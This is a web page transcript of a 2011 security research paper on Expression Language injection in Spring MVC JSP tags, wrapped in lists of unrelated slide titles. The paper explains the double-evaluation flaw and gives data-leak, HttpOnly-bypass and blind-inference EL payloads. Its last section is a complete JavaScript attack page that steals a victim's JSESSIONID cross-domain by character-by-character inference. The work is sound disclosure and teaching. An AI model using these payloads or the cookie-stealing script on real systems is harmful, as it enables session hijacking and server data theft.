Where are we now: A review of Arabic studies on Open Access 2005-2015Where are we now: A review of Arabic studies on Open Access 2005-2015
Where are we now: A review of Arabic studies on Open Access 2005-2015Islamic University of Lebanon
 
Kamus bahasa sansekerta
Kamus bahasa sansekertaKamus bahasa sansekerta
Kamus bahasa sansekertasarony05
 
Omraam mikhael-aivanhov-calea-tacerii
Omraam mikhael-aivanhov-calea-taceriiOmraam mikhael-aivanhov-calea-tacerii
Omraam mikhael-aivanhov-calea-taceriiSaplacan Vera
 
Perceperea persoanelor,formarea impresiilor (2)
Perceperea persoanelor,formarea impresiilor (2)Perceperea persoanelor,formarea impresiilor (2)
Perceperea persoanelor,formarea impresiilor (2)Saplacan Vera
 
2016 historical research getting started
2016 historical research getting started2016 historical research getting started
2016 historical research getting startedlavalleec
 
Animal Farm and Russian Revolution
Animal Farm and Russian RevolutionAnimal Farm and Russian Revolution
Animal Farm and Russian Revolutionlavalleec
 
Empresas que financian proyectos verdes
Empresas que financian proyectos verdesEmpresas que financian proyectos verdes
Empresas que financian proyectos verdesHector Figueroa Cañas
 
Rational rose 2000e using rose
Rational rose 2000e using roseRational rose 2000e using rose
Rational rose 2000e using roseSayoga Ekapranca
 

Viewers also liked (19)

Ulam undrakh
Ulam undrakhUlam undrakh
Ulam undrakh
 
Development of a blog system using Codeigniter Framework
Development of a blog system using Codeigniter FrameworkDevelopment of a blog system using Codeigniter Framework
Development of a blog system using Codeigniter Framework
 
Ulam undrakh-zaminuud
Ulam undrakh-zaminuudUlam undrakh-zaminuud
Ulam undrakh-zaminuud
 
ขอสอบ Eng O-net 51
ขอสอบ Eng O-net 51 ขอสอบ Eng O-net 51
ขอสอบ Eng O-net 51
 
Engaging Alumni through Technology: Cornell Class of '86
Engaging Alumni through Technology: Cornell Class of '86Engaging Alumni through Technology: Cornell Class of '86
Engaging Alumni through Technology: Cornell Class of '86
 
Botnet
BotnetBotnet
Botnet
 
ขอสอบ Eng O-net 52
ขอสอบ Eng O-net 52ขอสอบ Eng O-net 52
ขอสอบ Eng O-net 52
 
Where are we now: A review of Arabic studies on Open Access 2005-2015
Where are we now: A review of Arabic studies on Open Access 2005-2015Where are we now: A review of Arabic studies on Open Access 2005-2015
Where are we now: A review of Arabic studies on Open Access 2005-2015
 
Open access in arab countries: An overview
Open access in arab countries: An overviewOpen access in arab countries: An overview
Open access in arab countries: An overview
 
Kamus bahasa sansekerta
Kamus bahasa sansekertaKamus bahasa sansekerta
Kamus bahasa sansekerta
 
Omraam mikhael-aivanhov-calea-tacerii
Omraam mikhael-aivanhov-calea-taceriiOmraam mikhael-aivanhov-calea-tacerii
Omraam mikhael-aivanhov-calea-tacerii
 
Perceperea persoanelor,formarea impresiilor (2)
Perceperea persoanelor,formarea impresiilor (2)Perceperea persoanelor,formarea impresiilor (2)
Perceperea persoanelor,formarea impresiilor (2)
 
Arte
ArteArte
Arte
 
Ceramic pp
Ceramic ppCeramic pp
Ceramic pp
 
2016 historical research getting started
2016 historical research getting started2016 historical research getting started
2016 historical research getting started
 
Animal Farm and Russian Revolution
Animal Farm and Russian RevolutionAnimal Farm and Russian Revolution
Animal Farm and Russian Revolution
 
Empresas que financian proyectos verdes
Empresas que financian proyectos verdesEmpresas que financian proyectos verdes
Empresas que financian proyectos verdes
 
Capacidad de carga
Capacidad de cargaCapacidad de carga
Capacidad de carga
 
Rational rose 2000e using rose
Rational rose 2000e using roseRational rose 2000e using rose
Rational rose 2000e using rose
 

Similar to Expression language Injection

Nt1310 Unit 3 Language Analysis
Nt1310 Unit 3 Language AnalysisNt1310 Unit 3 Language Analysis
Nt1310 Unit 3 Language AnalysisNicole Gomez
 
Java for Mainframers
Java for MainframersJava for Mainframers
Java for MainframersRich Helton
 
College Project - Java Disassembler - Description
College Project - Java Disassembler - DescriptionCollege Project - Java Disassembler - Description
College Project - Java Disassembler - DescriptionGanesh Samarthyam
 
Top 30 Node.js interview questions
Top 30 Node.js interview questionsTop 30 Node.js interview questions
Top 30 Node.js interview questionstechievarsity
 
React & Redux JS
React & Redux JS React & Redux JS
React & Redux JS Hamed Farag
 
Creation of a Test Bed Environment for Core Java Applications using White Box...
Creation of a Test Bed Environment for Core Java Applications using White Box...Creation of a Test Bed Environment for Core Java Applications using White Box...
Creation of a Test Bed Environment for Core Java Applications using White Box...cscpconf
 
Introduction to Core Java Programming
Introduction to Core Java ProgrammingIntroduction to Core Java Programming
Introduction to Core Java ProgrammingRaveendra R
 
Web Component Development Using Servlet & JSP Technologies (EE6) - Chapter 6...
Web Component Development Using Servlet & JSP Technologies (EE6) - Chapter 6... Web Component Development Using Servlet & JSP Technologies (EE6) - Chapter 6...
Web Component Development Using Servlet & JSP Technologies (EE6) - Chapter 6...WebStackAcademy
 
Introduction
IntroductionIntroduction
Introductionrichsoden
 
Smoothing Your Java with DSLs
Smoothing Your Java with DSLsSmoothing Your Java with DSLs
Smoothing Your Java with DSLsintelliyole
 
Java New Evolution
Java New EvolutionJava New Evolution
Java New EvolutionAllan Huang
 
A Programmatic View and Implementation of XML
A Programmatic View and Implementation of XMLA Programmatic View and Implementation of XML
A Programmatic View and Implementation of XMLCSCJournals
 
Java J2EE Interview Questions Part 2
Java J2EE Interview Questions Part 2Java J2EE Interview Questions Part 2
Java J2EE Interview Questions Part 2javatrainingonline
 

Similar to Expression language Injection (20)

Nt1310 Unit 3 Language Analysis
Nt1310 Unit 3 Language AnalysisNt1310 Unit 3 Language Analysis
Nt1310 Unit 3 Language Analysis
 
Spring Basics
Spring BasicsSpring Basics
Spring Basics
 
copa-ii.pptx
copa-ii.pptxcopa-ii.pptx
copa-ii.pptx
 
js.pptx
js.pptxjs.pptx
js.pptx
 
JEE5 New Features
JEE5 New FeaturesJEE5 New Features
JEE5 New Features
 
Java for Mainframers
Java for MainframersJava for Mainframers
Java for Mainframers
 
College Project - Java Disassembler - Description
College Project - Java Disassembler - DescriptionCollege Project - Java Disassembler - Description
College Project - Java Disassembler - Description
 
Spring
SpringSpring
Spring
 
Top 30 Node.js interview questions
Top 30 Node.js interview questionsTop 30 Node.js interview questions
Top 30 Node.js interview questions
 
React & Redux JS
React & Redux JS React & Redux JS
React & Redux JS
 
Creation of a Test Bed Environment for Core Java Applications using White Box...
Creation of a Test Bed Environment for Core Java Applications using White Box...Creation of a Test Bed Environment for Core Java Applications using White Box...
Creation of a Test Bed Environment for Core Java Applications using White Box...
 
Introduction to Core Java Programming
Introduction to Core Java ProgrammingIntroduction to Core Java Programming
Introduction to Core Java Programming
 
Web Component Development Using Servlet & JSP Technologies (EE6) - Chapter 6...
Web Component Development Using Servlet & JSP Technologies (EE6) - Chapter 6... Web Component Development Using Servlet & JSP Technologies (EE6) - Chapter 6...
Web Component Development Using Servlet & JSP Technologies (EE6) - Chapter 6...
 
Introduction
IntroductionIntroduction
Introduction
 
Smoothing Your Java with DSLs
Smoothing Your Java with DSLsSmoothing Your Java with DSLs
Smoothing Your Java with DSLs
 
Java New Evolution
Java New EvolutionJava New Evolution
Java New Evolution
 
Java script summary
Java script summaryJava script summary
Java script summary
 
A Programmatic View and Implementation of XML
A Programmatic View and Implementation of XMLA Programmatic View and Implementation of XML
A Programmatic View and Implementation of XML
 
Java 8 Overview
Java 8 OverviewJava 8 Overview
Java 8 Overview
 
Java J2EE Interview Questions Part 2
Java J2EE Interview Questions Part 2Java J2EE Interview Questions Part 2
Java J2EE Interview Questions Part 2
 

Recently uploaded

How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity PlanDatabarracks
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteDianaGray10
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxLoriGlavin3
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsPixlogix Infotech
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyAlfredo García Lavilla
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024Lorenzo Miniero
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxNavinnSomaal
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxLoriGlavin3
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenHervé Boutemy
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Commit University
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxLoriGlavin3
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfAlex Barbosa Coqueiro
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Mattias Andersson
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024Stephanie Beckett
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESSALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESmohitsingh558521
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr BaganFwdays
 

Recently uploaded (20)

DMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special EditionDMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special Edition
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity Plan
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test Suite
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and Cons
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easy
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptx
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache Maven
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdf
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESSALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan
 

Expression language Injection

  • 1. Expression Language Injection Stefano Di Paola, Minded Security Arshan Dabirsiaghi, Aspect Security
  • 2. Table of Contents Expression Language Injection Table of Contents 1. Introduction 1.1 Expression Language 1.2 Where is JSP EL Used? 2. Related Work 3. Injecting JSP EL 3.1 Testing for Expression Language Injection Vulnerability 3.2 Reading Information 3.2.1 Default Scopes 3.2.2 Other Scopes 3.2.3 Limits of EL Resolution 3.2.4 Abuse Scenario #1: Server data leakage 3.2.5 Abuse Scenario #2: Application data leakage 3.2.6 Abuse Scenario #3: HttpOnly bypass 3.2.7 Persistent Expression Language Injection 4. Blind Injection 4.1 Inferring Values Via Direct Requests 4.2 Inferring User’s Secrets via Cross Domain Requests 5. Open Source Examples 6. Countermeasures 7. Conclusions 8. References 9. Authors
  • 3. 1. Introduction This paper discusses an undocumented vulnerability class called “Expression Language Injection”, which occurs when attackers control data that is evaluated by an Expression Language (EL) interpreter. It is likely that individuals have performed attacks against EL interpreters used in the past but new, specific attacks against Spring MVC JSP tags are discussed, and the techniques are generally applicable. A new technique for automatic enumeration of server-side data accessible through EL is also introduced. 1.1 Expression Language To provide easy ways of outputting data from an object model that more closely resembles pure scripting languages, “Expression Language” (EL) was developed as part of JSTL (Java Server Pages Standard Tag Library) [1]. Here is an example EL snippet: <c:out value=”person.address.street”/> This snippet finds the Java object (also called a “bean” or “model”) that’s in the current scope under the name of “person”, looks up a member object called “address” by looking for a getter method named “getAddress()”, and furthermore finds the “street” member of that object using the same method search pattern. After showing the equivalent scriptlet used to print the same data, it’s easy to see its utility: <%=HTMLEncoder.encode(((Person)person).getAddress().getStreet())%> This technique would also force the page to explicitly import the Person object, which unnecessarily couples the view to the model when all that’s needed is simple access to the bean’s attributes. Only since the JSP 2.0 specification has EL been available within JSP pages directly, and that’s still how it’s used in most cases. However, it can and has been used in non-view use cases. 1.2 Where is JSP EL Used? JSP EL is a specification (JSR-245 and JSR 252 [2]) and there are many implementations: ● JSP 2.0/2.1: Used by most recently built applications, and delivered as part of the JSTL. ● Jakarta: An older EL implementation built by Apache. ● OGNL: A powerful EL popularized by Struts2/WebWork. ● MVEL: A general purpose EL usable for console applications. ● SPEL: Spring’s custom EL for scripting (not used in JSPs).
  • 4. 2. Related Work Meder Kydyraliev abused unchecked and automatic interpretation of OGNL expression language in request parameters in Struts2 [5]. OGNL exposes many stateful operations which eventually yielded remote command execution. Dinis Cruz wrote about insecure Spring MVC autobinding patterns which could be used to get user data into unexpected bean properties. This could be used to accomplish EL injection in more places [14].
  • 5. 3. Injecting JSP EL A simple use case of JSP EL within a Spring MVC JSP tag is the following: ... <spring:message scope=”${param.foo}”/> ... This will cause the JSP to echo the value of “foo” request parameter to the browser. Since it will be encoded, there is no risk for XSS. However, this particular tag will evaluate any nested JSP EL found within the “scope” attribute, as shown by the following code from org.springframework.web.servlet.tags.MessageTag [9][13]: protected final int doStartTagInternal() throws JspException, IOException { try { String msg = resolveMessage(); msg = isHtmlEscape() ? HtmlUtils.htmlEscape(msg) : msg; msg = this.javaScriptEscape ? JavaScriptUtils.javaScriptEscape(msg) : msg; String resolvedVar = ExpressionEvaluationUtils.evaluateString("var", this.var, this.pageContext); if (resolvedVar != null) { String resolvedScope = ExpressionEvaluationUtils.evaluateString("scope", this.scope, this.pageContext); this.pageContext.setAttribute(resolvedVar, msg, TagUtils.getScope(resolvedScope) ); … In other words, the values passed to these tags are “double evaluated”, which is probably not what the developers intends. Because of that, attackers can provide EL within their input that will be evaluated by the server and sent back down to the client. Abusing this behavior to trick the server into leaking information is an attack we’re calling Expression Language Injection. By looking for similar patterns in the Spring MVC code it’s possible to find similar implementations on several tag attribute definitions. The following table highlights tags which exhibit the dangerous double evaluation behavior in Spring MVC 2.x and 3.01: Tag Attributes <spring:hasBindErrors> name 1 New versions of Spring MVC could introduce new potentially vulnerable tags which are not covered in this paper.
  • 6. <spring:bind> path <spring:message> arguments, code, text, var, scope, message <spring:theme> arguments, code, text, var, scope, message <spring:nestedpath> path <spring:transform> var, scope, value The vulnerable pattern for EL injection would involve a JSP that contains one or more of the above Spring tag and attribute combinations with some user-controlled piece of information, like a request parameter, header, cookie or a bean value that has been populated with untrusted data. 3.1 Testing for Expression Language Injection Vulnerability Depending on the attributes into which the vulnerability is, finding these vulnerabilities in a blackbox testing scenario can be done by sending certainly valid EL such as: ● ${“aaaa”} (the literal string “aaaa”) and then searching the response text for such data without the EL syntax found around it; ● or ${99999+1} and then searching the response text for 100000. It’s also possible that the EL being interpreted by your payload is expecting a certain legal value (such as as the name of a property key as in <spring:message code=”${value}”/>). In this case, it’s very likely that the EL injected will reference an invalid key and cause an exception. If a generic error message is shown, and the application is using Spring, chances are good that the field is vulnerable to injection. 3.2 Reading Information This section discusses options and limitations for attackers who can inject arbitrary EL. 3.2.1 Default Scopes Even though an unfortunate amount of data is always available to attackers that can read the results of injected EL, there may be severely harmful data available to attackers depending on what’s “laying around” in scope and what resolvers are active in the application. There is a default set of implicitly defined scopes [3] that will contain internal server information: ● applicationScope: global variables. ● requestScope: request attributes. ● sessionScope: normal session variables. ● pageScope: variables necessary for this page alone (not included pages or parents).
  • 7. initParam:parameters used to initialize this servlet from web.xml. A live demonstration page is available for interested readers [16]. 3.2.2 Other Scopes Applications can also register their own resolvers which will allow other scopes (or other properties of existing scopes) to be made available. Spring provides optional resolvers to expose its own beans via the web application context with SpringBeanFacesELResolver and WebApplicationContextFacesELResolver [7] [8] (under the scope “webApplicationContext”). These allow all registered Spring beans of all types to be read with EL. This pattern is extremely dangerous since an EL injection vulnerability would allow an attacker to inspect properties of beans unrelated to the view of the application containing sensitive information There may be other scopes introduced by technologies in the target’s stack. For example, Spring WebFlow’s ImplicitFlowVariableELResolver.java [6] exposes many scopes. In the implementation many of these are technically redundant, but for completeness here is the list of scopes available: ● requestParameters ● flashScope ● viewScope ● flowScope ● conversationScope ● messageContext ● externalContext ● flowExecutionContext ● flowExecutionUrl ● currentUser ● currentEvent Here is a snippet from the Spring Faces documentation regarding their increased EL capability [8]: “This allows for JSF users to use the same expression language in their flow definitions as in their JSF views, and to have access to the full chain of JSF resolvers for expression evaluation.” Technologies other than Spring can also provide unexpected resolvers. For instance, there is an Apache library that adds an “applicationContext” scope [7] that also exposes all Spring beans. 3.2.3 Limits of EL Resolution It’s worth noting the limits of standard EL resolution. The following is a list of standard resolvers
  • 8. set forth by the Unified Expression Language, retrieved from [4]. ArrayELResolver ${myArray[1]} Returns the value at index 1 in the array called myArray BeanELResolver ${employee.lNam Returns the value of the lName property of the e} employee bean ListELResolver ${myList[5]} Returns the value at index 5 of myList list MapELResolver ${myMap.someKey Returns the value stored at the key, someKey, in } the Map, myMap ResourceBundleELResol ${myRB.myKey} Returns the message at myKey in the resource ver bundle called myRB An attacker is limited to whatever operations are possible with the given resolvers. Although there is no contract that such operations be read-only, the specification does not list any operations that well-known have side effects. The following section dictates some simple attacks when able to executing EL Injection. 3.2.4 Abuse Scenario #1: Server data leakage Assuming the simplest vulnerability possible, let’s look at some variables to request which can leak interesting data back: ... <spring:text scope=”${param.foo}”/> ... The request parameter “foo” will be interpreted here. The following table shows what happens when the user passes in different, interesting values for that parameter: Parameter Value Explanation Resulting HTML ${applicationScope} The toString() of the ... application scope object {org.apache.catalina.jsp_classpath=/ contains the classpath home/arshan/ELInjection/target/ and local working ELInjection/WEB-INF/classes/:/ directories, among other home/arshan/ELInjection/target/ things. ELInjection/WEB-INF/lib/aopalliance- 1.0.jar:/home/arshan/ELInjection/ target/ELInjection/WEB-INF/lib/ commons-logging-1.1.1.jar ... javax.servlet.context.tempdir=/ home/arshan/ELInjection/target/ tomcat/work/localEngine/localhost/
  • 9. ELInjection } ${requestScope} The toString() of the {javax.servlet.forward.quer request scope shows lots y_string=test=messagetext&e of relatively uninteresting xpr=%24%7BrequestScope%7D, things, but may help javax.servlet.forward.request_uri=/ an attacker fingerprint ELInjection/eval.htm, technologies the the javax.servlet.forward.servlet_path=/ application’s virtual URL eval.htm, routing. ... display name [WebApplicationContext for namespace 'vc-servlet']; startup date [Tue Jul 19 22:35:58 EEST 2011]; org.springframework.web.servlet.view .InternalResourceView.DISPATCHED_PAT H=eval.jsp ... } 3.2.5 Abuse Scenario #2: Application data leakage Even within the default scopes, there is very likely to be data to which attackers shouldn’t have access.Developers may perform a sub-select on a set containing sensitive information. With JSP EL injection, attackers will be able to retrieve those values that are just “hanging around”. Consider this example snippet from The JavaEE 5 Tutorial showing usage of SQL tags: <c:set var="bid" value="${param.Add}"/> <sql:query var="books" > select * from PUBLIC.books where id = ? <sql:param value="${bid}" /> </sql:query> The SQL query results are stored in the “books” parameter in the pageContext scope. Given an EL injection, an attacker could read the results from this variable as easily as the developer and get access to other book data. Depending on how the code was written, the connection string or the query itself might also be available. Even savvy developers will not write code to avoid such situations since they’d assume the secrecy of server-side variables. 3.2.6 Abuse Scenario #3: HttpOnly bypass EL Injection can be used to force the server to echo the session cookie back to the browser inside HTML, effectively “bypassing” any HttpOnly protection for application pages vulnerable to cross-site scripting (XSS). Here is an example value that can be injected to read the target’s “JSESSIONID” (shown here unencoded in the querystring): http:///vulnerable.com/spring/foo?param=${cookie["JSESSIONID"].value} Of course, it’s also possible to use drag-and-drop clickjacking [17] techniques to steal this data
  • 10. from pages that don’t even contain XSS vulnerabilities. 3.2.7 Persistent Expression Language Injection It’s worth noting that as with most other injection attacks, Expression Language Injection could also be leveraged from user controlled stored data just like persistent XSS or second order SQL injection.
  • 11. 4. Blind Injection Any attack described so far, assumes there is an in-band scenario. In other words, it relies on the fact that the information is displayed back in the server response. This is obviously not always possible, since the application could redirect to another page in case of application errors, or simply does not use that value in the HTML. In that case it is still possible to gather information via EL Injection by taking advantage of inference techniques. 4.1 Inferring Values Via Direct Requests The only thing an attacker needs is a condition expression which returns a legit value in case the condition is true and a unexpected value otherwise. According to Expression Language definition [1] in the Operators section, the ternary conditional operator is an accepted construct, and therefore it could be used in order to infer values: ... In addition to the . and [] operators discussed in Variables, the JSP expression language provides the following operators: ● Arithmetic: +, - (binary), *, / and div, % and mod, - (unary) ● Logical: and, &&, or, ||, not, ! ● Relational: ==, eq, !=, ne, <, lt, >, gt, <=, ge, >=, le. Comparisons can be made against other values, or against boolean, string, integer, or floating point literals. ● Empty: The empty operator is a prefix operation that can be used to determine whether a value is null or empty. ● Conditional: A ? B : C. Evaluate B or C, depending on the result of the evaluation of A. ... The latest problem to be solved consists in finding two values that will trigger different responses from the server. In order do this, an attacker can try to abuse conditional and the comparison operator with the following input: ${variableName.value >= ‘charSequence’ ? V1 : V2} Where: ● variableName is the name of the server side attribute the attacker is willing to retrieve the value. ● charSequence is a sequence of characters whose length and content is dynamically built according to inference. ● V1 is a value that will be valid for the EL parser and for the application. ● V2 is a value that will be valid for the EL parser but will trigger some kind of exception in the underlying code. The pseudo code of the linear inference algorithm can be described as follows:
  • 12. var charset = ”abcdef...”; var idx = 0; var foundSeq = ””; var payload = “${variableName >= “+foundSeq+” ? ‘V1’ : ‘V2’}”; while(1){ If ( response(payload) isFrom V1) { idx++; payload = “${variableName >= “+foundSeq+charset[idx]+” ? ‘V1’ : ‘V2’}”; } else { if ( idx > charset.length ) { print “found ”+ foundSeq; break; } foundSeq=foundSeq+charset[idx-1]; idx = 0; } } As any inference algorithm based on > and < comparision operators, it may be improved using binary search algorithm or other optimization techniques, whose implementation goes beyond the scope of this document. Inference expressions according to attributes: Tags Attribute Name Inference payload example spring:message code ${Condition?"Ok":1>true} spring:theme text arguments scope spring:message message ${Condition? spring:theme org.springframework.context .MessageSourceResolvable: 1>true} spring:bind path beanName2.${Condition?'*':1 >true} spring:nestedPath path ${Condition?"Ok":1>true} spring:hasBindErrors name ${Condition?"Ok":1>true} spring:transform value ${Condition?"Ok":1>true} var scope 2 where beanName is a valid name for an application Bean.
  • 13. 4.2 Inferring User’s Secrets via Cross Domain Requests In case a legitimate user has a valid session an attacker can try to infer data by using server status codes and inference via a malicious page on victim’s browser. As will be described, in this scenario the attacker won’t need any XSS in order to steal cookies or other sensitive data; it is in fact possible to successfully use Expression Language conditional operators to infer complete values taking advantage of browser response using script events with the following hypothesis: 1. The victim needs to be logged in order to give some secret to share. I.E. her session. 2. Vulnerable server shall return two different status codes, like 200 and 404 or 500. The following script will try to steal the victim’s JSESSIONID cookie from an attacker’s off- domain page: <script> var values=""; var url="http://victimhost/App/page.htm?par=${cookie['JSESSIONID'].value.bytes[|IDX| ]==|VAL|?'d':1>true}"; var map="0123456789ABCDEF"; // map of allowed characters var idx=-1; var idx2=-1; var arr=[]; // this var will store the correct values. var scr; var maxLength=32; var reqNumber=1; function getNext(){ return map[idx].charCodeAt(0); } function nextChar(){ idx++; return url.replace("|VAL|",getNext()).replace("|IDX|",idx2); } function $(id){return document.getElementById(id)} function createEl(url){ var scr=document.createElement("script"); // server returns status 20x: it’s a valid value scr.onload=function(){ // let’s save the cookie value and position in the array arr[this.id]=this.getAttribute("x"); $("ciphers").innerHTML=arr.length; if(arr.length==maxLength) $("finalResult").innerHTML="<b>Final Result</b> Your Session Is: "+arr.join(''); };
  • 14. scr.id=idx2; scr.setAttribute("x",map[idx]); scr.src=url; $("messages").innerHTML="# of Requests:"+reqNumber; reqNumber++; return scr } function go(){ try{ // creates a number of scripts to enumerate all characters in all positions. for(var j=0;j<32;j++) { for(var i=0;i< map.length;i++){ idx2=j; var scr=createEl(nextChar()); document.body.appendChild(scr); } idx=-1;// reset the map index } }catch(r){ } } window.onerror=function(){return true;} </script> <body onload=go()><style>body {color: white; background-color: black}</style> <h3>Secret Retrieving via Expression Language Injection Using Client Side Inference</h3> This page tries to retrieve victim's JSESSIONID using inference against an application vulnerable to Expression Language injection. <div> See .... for more information. </div> <div> <div><b>Attack information:</b> <span id="messages">&nbsp;</span><br>Found: <span id="ciphers">&nbsp;</span></div> <div id="finalResult">&nbsp;</div> </div> Loading victim server on an iframe just to be sure we have a session. <div> <iframe height=1 width=1 src="http://victimhost/App/page.htm"></iframe> </div> <div>This page is used for pure demonstration. Use at your own risk!</div> <div>Authors: Stefano Di Paola and Arshan Dabirsiaghi</div> <div>Date: July 2011</div> </body> A live example can be seen on www.wisec.it [15].
